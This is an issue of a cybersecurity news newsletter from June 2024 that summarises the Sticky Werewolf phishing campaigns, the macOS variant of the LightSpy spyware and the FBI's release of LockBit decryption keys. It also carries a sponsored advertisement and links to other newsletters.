Jun 10 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that's casting out the scams and netting you the latest security tips! ๐ฃ๐ฃ๐ฃ
Todayโs hottest cybersecurity news stories:
๐บ Sticky Werewolf expands operations to Russia, Belarus ๐
๐ต๏ธ LightSpyโs macOS variant has advanced surveillance ๐ก
๐ 7000 LockBit ransomware decryption keys released by FBIย ๐ฎย
Gif by abcnetwork on Giphy
New Targets Unveiled! ๐ญโ๏ธ๐ Sticky Werewolf is back, now attacking a pharmaceutical company, a Russian microbiology research institute, and the aviation sector. Previously focused on government entities, these hackers have broadened their horizons.
Phishing Tactics! ๐ฃ๐ง๐ป
Method: Phishing emails with malicious links.
Payload: LNK files in RAR archives leading to malware stored on WebDAV servers.
Outcome: Delivers Remote Access Trojans (RATs) like NetWire.
Complex Infection Chain! ๐๐๐ฆ
Opening LNK files from these emails triggers a chain reaction:
Executes a binary hosted on WebDAV.
Runs an obfuscated batch script.
Launches an AutoIt script to inject the final payload, evading security software.
What's Next? ๐๐
Sticky Werewolf uses CypherIT variants to deliver RATs like Rhadamanthys and Ozone.ย Attribution remains unclear, though geopolitical clues hint at potential pro-Ukrainian origins.
Other Wolves on the Prowl! ๐บ
Sapphire Werewolf: Over 300 attacks on various Russian sectors.
Fluffy Wolf & Mysterious Werewolf: Use spear-phishing to deploy malware like Remote Utilities, XMRig miner, WarZone RAT, and RingSpy backdoor.
Stay vigilant and protect your digital realm! ๐ก๏ธ๐๐ป
New Threats Uncovered! ๐ป๐ฑ Cybersecurity researchers have found that LightSpy spyware, initially targeting iOS users, has a macOS variant. This cross-platform malware can infect Android, iOS, Windows, macOS, Linux, and various routers!
Key Findings! ๐ง๐
Exploits Used: CVE-2018-4233 and CVE-2018-4404.
Targets: macOS version 10, primarily via Safari WebKit flaws.
Payloads: Privilege escalation exploit, encryption/decryption utility, and ZIP archives.
How It Works! ๐๐ ๏ธ
Rogue HTML: Triggers code execution.
Binary as PNG: Delivers malicious code.
Shell Script: Fetches additional payloads.
Persistence: Sets up with "update" file acting as a loader.
Capabilities! ๐ก๏ธ๐ค๐ธ
LightSpy's macOS variant uses 10 plugins to:
Capture audio and photos
Record screen activity
Extract and delete files
Execute shell commands
Harvest browser data and iCloud Keychain info
Perform network discovery
In the Wild! ๐๐
Active since January 2024, LightSpy's macOS variant has affected around 20 devices, mostly test units. Despite limited reach, its sophisticated attack chain poses significant risks.
Geopolitical Impact! ๐๐ต๏ธโโ๏ธ
Reports of Pegasus spyware attacks on activists in Latvia, Lithuania, and Poland highlight the ongoing cyber espionage targeting Russian- and Belarusian-speaking journalists since at least 2020.
Stay informed and secure! ๐ก๏ธ๐๐
Stay ahead of the curve with Presspool.ai! ๐ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐ค๐ก Thatโs us, alright! ๐คต How about you? Visionary AI executive, much? ๐
And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐ค๐ฉโ๐ป๐
Rest assured, the process is very straightforward.
You simply:
๐ Sign Up & Create Campaign
๐ Define your audience, budget, and message to captivate your audience.
๐ Launch your campaign, as Presspoolโs AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ฏ
๐ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐ Elevate your marketing game and stay informed with Presspool.ai! ๐ Simples! ๐ฆฆ
Presspool.aiย ๐ฐ๐๐ค may just have what you need to succeed. And if the product isnโt for you, the newsletter alone is a gamechanger. And we know newsletters ๐
Big News! ๐๐ป The FBI has announced they have over 7,000 decryption keys to help victims of the LockBit ransomware recover their data for free! If you think youโve been affected, visit the FBIโs Internet Crime Complaint Center at ic3.gov.
Key Highlights! ๐๏ธ๐
LockBitโs Reach: Linked to 2,400 attacks globally, with 1,800 in the U.S.
Operation Cronos: Dismantled LockBitโs online infrastructure in February 2024.
Key Figure: Dmitry Yuryevich Khoroshev, the alleged administrator, denies involvement but was outed by authorities.
Victim Assistance! ๐
FBI Cyber Division Assistant Director Bryan Vorndran encourages victims to reach out. He also warns that paying ransoms doesnโt guarantee data safety, and victims may still face future extortion.
Ransomware Reality! ๐๐
Recovery Rate: Organisations hit by ransomware recover only 57% of compromised data on average, according to the Veeam Ransomware Trends Report 2024.
Emerging Threats: New ransomware players like SenSayQ and CashRansomware are on the rise, refining their tactics.
Evolving Tactics! โ๏ธ๐ฆ
LockBit and other ransomware groups are constantly evolving. The TargetCompany ransomware now uses a new Linux variant to target VMWare ESXi systems, exploiting Microsoft SQL servers for initial access.
Stay Vigilant! ๐จ
The FBI's efforts are a big step in combating ransomware, but it's crucial for organisations to stay vigilant and prepared. Protect your data, and don't let cybercriminals hold you hostage!
๐๏ธ Extra, Extra! Read all about it! ๐๏ธ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
๐ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐
๐ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐
๐ย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐พ
Let us know what you think.
So long and thanks for reading all the phish!